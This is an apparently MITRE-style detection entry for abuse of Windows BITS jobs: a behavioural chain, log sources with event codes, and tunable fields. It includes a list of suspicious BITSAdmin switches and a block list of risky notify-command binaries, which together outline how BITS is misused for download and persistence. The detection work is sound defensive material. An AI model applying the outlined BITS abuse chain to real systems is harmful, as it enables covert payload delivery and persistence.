DET0098 Detect abuse of Windows BITS Jobs for download, execution and persistence

Item	Value
ID	DET0098
Version	1.0
Created	21 October 2025
Last Modified	21 October 2025

Technique Detected: T1197 (BITS Jobs)

Analytics

Windows

AN0274

Behavioral chain: (1) An actor creates or modifies a BITS job via bitsadmin.exe, PowerShell BITS cmdlets, or COM; (2) the job performs HTTP(S)/SMB network transfers while the owning user is logged on; (3) upon job completion/error, BITS launches a notify command (SetNotifyCmdLine) from svchost.exe -k netsvcs -s BITS, often establishing persistence by keeping long-lived jobs. The strategy correlates process creation, command/script telemetry, BITS-Client operational events, and network connections initiated by BITS.

Log Sources

Data Component	Name	Channel
Process Creation (DC0032)	WinEventLog:Security	EventCode=4688
Network Connection Creation (DC0082)	WinEventLog:Sysmon	EventCode=3, 22
Command Execution (DC0064)	WinEventLog:PowerShell	EventCode=4103, 4104, 4105, 4106
Service Creation (DC0060)	WinEventLog:System	EventCode=7036

Mutable Elements

Field	Description
TimeWindow	Correlation window linking job creation, transfer, and notify execution (e.g., 30m–24h depending on environment and BITS retry behavior).
ExpectedUpdateHosts	Allow-list of corporate update/CDN endpoints that legitimately use BITS (WSUS, MEMCM, vendor updaters).
SuspiciousCliSwitches	BITSAdmin flags of interest (/transfer, /addfile, /SetNotifyCmdLine, /resume, /setcustomheaders, /setminretrydelay).
NotifyCmdBlockList	Known risky binaries or folders (e.g., %TEMP%*.exe, powershell.exe, cmd.exe) used as BITS notify commands.
UserContext	Scope by interactive users, service accounts, or high-value targets (admins/servers) to reduce benign noise.
ExternalNetCIDRs	Definition of external/non-corp destinations for network correlation.
JobLifetimeThreshold	Maximum age or retry count for benign jobs before flagging persistence (e.g., >3 days or retry>20).